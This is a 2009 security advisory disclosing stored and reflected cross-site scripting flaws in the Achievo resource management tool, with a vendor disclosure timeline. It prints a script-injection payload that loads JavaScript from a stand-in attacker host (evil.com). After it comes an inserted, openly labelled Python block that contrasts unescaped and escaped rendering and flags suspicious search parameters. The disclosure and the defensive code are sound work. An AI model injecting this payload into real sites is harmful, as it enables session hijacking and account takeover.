[BONSAI] XSS in Achievo - Customized XSS payload included

           Bonsai Information Security - Advisory

                   Multiple XSS in Achievo

1. *Advisory Information*

Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-mu=
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733

3. *Software Description*

Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].

4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.

For additional information, please read [1].

5. *Vulnerable packages*

Version <= 1.3.4

6. *Non-vulnerable packages*

Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:

7. *Credits*

This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).

8. *Technical Description*

8.1 A Persistent Cross Site Scripting vulnerability was found in the title
variable within the scheduler module. This is because the application does not
properly sanitise the user's input. The vulnerability can be triggered by
submitting the following data within the scheduler title:

    <SCRIPT SRC=//evil.com/xss.js></SCRIPT>

This will include the xss.js javascript file within the schedule. A javascript
that exploits this issue and creates a new administrator user in the system can
be found in Bonsai's blog [2].

8.2 A Reflected Cross Site Scripting vulnerability was found in the
atksearch[contractnumber], atksearch_AE_customer[customer] and
atksearchmode[contracttype] variables within the Organisation Contracts
administration page. This is because the application does not properly sanitise
the user's input. The vulnerability can be triggered by clicking on the
following URL:


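The following is an added example (not Achievo's or Bonsai's code) showing the mitigation for 8.1, HTML-encoding the scheduler title at output time, next to the unencoded "before" behaviour, and a detection check for 8.2 that flags requests whose search parameters carry markup characters. The page markup, the render functions, the sample URLs and the helper names are assumptions; the payload is the one quoted in 8.1.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Payload quoted in section 8.1 of the advisory, used here only as test input.
ADVISORY_PAYLOAD = '<SCRIPT SRC=//evil.com/xss.js></SCRIPT>'

# Parameter names listed in section 8.2 of the advisory.
REFLECTED_PARAMS = {
    "atksearch[contractnumber]",
    "atksearch_AE_customer[customer]",
    "atksearchmode[contracttype]",
}

def render_title_vulnerable(title: str) -> str:
    """'Before' behaviour (assumed page markup): the title is placed in the
    HTML verbatim, so a title containing a tag becomes active markup."""
    return f'<div class="schedule-title">{title}</div>'

def render_title_fixed(title: str) -> str:
    """Mitigation: HTML-encode the title at output time. <, >, & and quotes
    become entities, and the browser renders the title as text only."""
    return f'<div class="schedule-title">{html.escape(title, quote=True)}</div>'

SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)

def contains_script_tag(rendered: str) -> bool:
    """Check used to contrast the two renderers: does a real <script> tag
    (not an encoded &lt;script&gt; entity sequence) survive in the output?"""
    return bool(SCRIPT_TAG_RE.search(rendered))

def suspicious_search_params(url: str) -> list:
    """Detection for 8.2: return the advisory's search parameters whose value
    contains markup characters. parse_qs URL-decodes keys and values, so
    both raw and percent-encoded forms (%3C, %3E, %22, %27) are caught."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = [key for key, values in params.items()
            if key in REFLECTED_PARAMS
            and any(re.search(r'[<>"\']', v) for v in values)]
    return sorted(hits)

if __name__ == "__main__":
    print(render_title_vulnerable(ADVISORY_PAYLOAD))
    print(render_title_fixed(ADVISORY_PAYLOAD))
    # Constructed sample request against an assumed Achievo front controller.
    sample = ("http://achievo.example/index.php?atksearch%5Bcontractnumber%5D="
              "%3Cx%3E&atksearchmode%5Bcontracttype%5D=substring")
    print(suspicious_search_params(sample))
```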
9. *Report Timeline*

    - 2009-07-09:
      Vulnerabilities were identified.

    - 2009-08-08:
      Vendor contacted.

    - 2009-08-12:
      Vendor confirmed vulnerabilities.

    - 2009-08-14:
      Vendor sets possible release date of fixed version to Monday 12 Oct.

    - 2009-10-12:
      Vendor released fixed version.

    - 2009-10-13:
      The advisory BONSAI-2009-0101 is published.

10. *References*

[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/

11. *About Bonsai*

Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is